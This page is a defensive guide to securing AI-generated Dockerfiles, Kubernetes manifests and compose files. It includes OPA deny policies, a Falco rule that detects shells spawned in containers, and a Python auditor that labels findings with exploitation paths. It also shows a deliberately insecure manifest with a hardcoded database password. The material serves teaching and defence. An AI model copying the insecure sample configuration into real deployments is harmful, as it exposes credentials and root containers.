Prompt Engineering for Secure Dockerfiles

Rather than relying solely on post-generation scanning, you can guide LLMs toward secure output through careful prompting. The following system prompt produces significantly more secure Dockerfiles:

You are a Docker security expert. When generating Dockerfiles, always follow these rules:

1. Use minimal base images (alpine or distroless variants)
2. Never run as root — always create and switch to a non-root user
3. Pin base images by SHA-256 digest, not just tag
4. Use multi-stage builds to minimize final image size and attack surface
5. Never embed secrets — use BuildKit secret mounts or runtime injection
6. Install only production dependencies, remove package manager caches
7. Include HEALTHCHECK directives
8. Add .dockerignore to exclude .git, .env, node_modules, and test files
9. Set filesystem to read-only where possible
10. Drop all Linux capabilities and add back only what is needed

Defensive Recommendations

Organizations using AI-generated container configurations should implement the following controls:

# OPA Rego policy: deny containers running as root
package kubernetes.admission
 
deny[msg] {
    input.request.kind.kind == "Pod"
    container := input.request.object.spec.containers[_]
    not container.securityContext.runAsNonRoot
    msg := sprintf("Container '%v' must set runAsNonRoot to true", [container.name])
}
 
deny[msg] {
    input.request.kind.kind == "Pod"
    container := input.request.object.spec.containers[_]
    container.securityContext.privileged
    msg := sprintf("Container '%v' must not run in privileged mode", [container.name])
}

Runtime Security Monitoring: Deploy Falco or a similar runtime security tool to detect anomalous container behavior that might indicate exploitation of a misconfigured container:

# Falco rule: detect shell spawned in container
- rule: Shell Spawned in Container
  desc: Detect shell execution in a running container
  condition: >
    spawned_process and container and
    proc.name in (bash, sh, zsh, dash, csh) and
    not proc.pname in (known_shell_parents)
  output: >
    Shell spawned in container
    (container=%container.name user=%user.name shell=%proc.name
     parent=%proc.pname cmdline=%proc.cmdline)
  priority: WARNING

Red Team Exercise: Exploiting AI-Generated Container Configurations

The following exercise demonstrates how a red team might exploit common AI-generated Dockerfile vulnerabilities in a controlled environment:

"""
Red team exercise: Identify and exploit vulnerabilities in
AI-generated Dockerfiles within a target repository.
"""
 
import subprocess
import re
from pathlib import Path
from dataclasses import dataclass
 
@dataclass
class DockerfileVulnerability:
    file: str
    line: int
    category: str
    severity: str
    description: str
    exploitation_path: str
 
def audit_dockerfile(path: Path) -> list[DockerfileVulnerability]:
    """Audit a single Dockerfile for AI-generated anti-patterns."""
    vulns = []
    content = path.read_text()
    lines = content.splitlines()
 
    has_user_directive = False
    has_healthcheck = False
 
    for i, line in enumerate(lines, 1):
        stripped = line.strip()
 
        # Check for USER directive
        if stripped.startswith("USER") and not stripped.startswith("USER root"):
            has_user_directive = True
 
        # Check for HEALTHCHECK
        if stripped.startswith("HEALTHCHECK"):
            has_healthcheck = True
 
        # Check for secrets in ENV/ARG
        if re.match(r"^(ENV|ARG)\s+\w*(PASSWORD|SECRET|KEY|TOKEN)\w*[=\s]",
                     stripped, re.IGNORECASE):
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="secrets_exposure",
                severity="CRITICAL",
                description=f"Secret potentially embedded in layer: {stripped[:60]}",
                exploitation_path="Extract via docker history or layer inspection"
            ))
 
        # Check for unpinned images
        if stripped.startswith("FROM") and "@sha256:" not in stripped:
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="unpinned_image",
                severity="HIGH",
                description=f"Base image not pinned by digest: {stripped}",
                exploitation_path="Supply chain attack via tag mutation"
            ))
 
        # Check for dangerous COPY patterns
        if stripped.startswith("COPY . ") or stripped == "COPY . .":
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="information_disclosure",
                severity="MEDIUM",
                description="Entire build context copied — may include secrets",
                exploitation_path="Access .git, .env, credentials via container"
            ))
 
    if not has_user_directive:
        vulns.append(DockerfileVulnerability(
            file=str(path), line=0, category="privilege_escalation",
            severity="HIGH",
            description="No USER directive — container runs as root",
            exploitation_path="Kernel exploit or container escape from root context"
        ))
 
    if not has_healthcheck:
        vulns.append(DockerfileVulnerability(
            file=str(path), line=0, category="availability",
            severity="LOW",
            description="No HEALTHCHECK — compromised container may go undetected",
            exploitation_path="Maintain persistence without health monitoring detection"
        ))
 
    return vulns
 
def scan_repository(repo_path: str) -> list[DockerfileVulnerability]:
    """Scan all Dockerfiles in a repository."""
    repo = Path(repo_path)
    all_vulns = []
 
    for dockerfile in repo.rglob("Dockerfile*"):
        all_vulns.extend(audit_dockerfile(dockerfile))
 
    for composefile in repo.rglob("docker-compose*.yml"):
        # Parse compose files for security misconfigurations
        content = composefile.read_text()
        if "privileged: true" in content:
            all_vulns.append(DockerfileVulnerability(
                file=str(composefile), line=0,
                category="privilege_escalation", severity="CRITICAL",
                description="Privileged container in compose configuration",
                exploitation_path="Full host access via privileged container"
            ))
 
    return all_vulns
 
if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    vulns = scan_repository(target)
    for v in sorted(vulns, key=lambda x: x.severity):
        print(f"[{v.severity}] {v.file}:{v.line} — {v.description}")
        print(f"  Exploitation: {v.exploitation_path}")
        print()

Kubernetes Manifest Security

# AI-generated Kubernetes deployment — multiple security issues
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: web-app
  template:
    metadata:
      labels:
        app: web-app
    spec:
      containers:
      - name: web-app
        image: myapp:latest         # Unpinned image
        ports:
        - containerPort: 3000
        env:
        - name: DATABASE_URL
          value: "postgresql://admin:password@db:5432/app"  # Secret in manifest
        # Missing: securityContext, resource limits, readiness probes
 
---
# Hardened version
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: web-app
  template:
    metadata:
      labels:
        app: web-app
    spec:
      automountServiceAccountToken: false
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
        fsGroup: 1000
        seccompProfile:
          type: RuntimeDefault
      containers:
      - name: web-app
        image: myapp@sha256:abc123...  # Pinned by digest
        ports:
        - containerPort: 3000
        env:
        - name: DATABASE_URL
          valueFrom:
            secretKeyRef:
              name: db-credentials
              key: url
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop:
              - ALL
        resources:
          limits:
            cpu: "500m"
            memory: "512Mi"
          requests:
            cpu: "250m"
            memory: "256Mi"
        readinessProbe:
          httpGet:
            path: /health
            port: 3000
          initialDelaySeconds: 5
          periodSeconds: 10
        livenessProbe:
          httpGet:
            path: /health
            port: 3000
          initialDelaySeconds: 15
          periodSeconds: 20
        volumeMounts:
        - name: tmp
          mountPath: /tmp
      volumes:
      - name: tmp
        emptyDir: {}

Docker Compose Supply Chain Risks

AI-generated docker-compose files frequently reference community images without verification, creating supply chain risk:

# AI-generated docker-compose with supply chain risks
services:
  redis:
    image: redis:latest                    # Official but unpinned
  mongo:
    image: mongo:latest                    # Official but unpinned
  elasticsearch:
    image: elasticsearch:latest            # Official but unpinned
  nginx-proxy:
    image: jwilder/nginx-proxy:latest      # Third-party, unpinned
  phpmyadmin:
    image: phpmyadmin/phpmyadmin:latest    # Third-party, unpinned
  mailhog:
    image: mailhog/mailhog:latest          # Archived project, no updates

Key Takeaways

References

Henkel, J., et al. (2024). "An Empirical Study of AI-Generated Dockerfiles." IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER). Analysis of security patterns in LLM-generated container configurations across multiple models.
Shu, R., et al. (2023). "On the Security of Containers: Threat Modeling, Attack Analysis, and Mitigation Strategies." ACM Computing Surveys. Comprehensive taxonomy of container security threats relevant to AI-generated configurations.
Docker Inc. (2025). "Docker Security Best Practices." Docker Documentation. https://docs.docker.com/build/building/best-practices/
NIST SP 800-190 (2017). "Application Container Security Guide." National Institute of Standards and Technology. Framework for container security assessment applicable to AI-generated configurations.

Edit this page on GitHub

LLM-Generated Dockerfile Security

Related articles

LLM-Generated Dockerfile Security

Related articles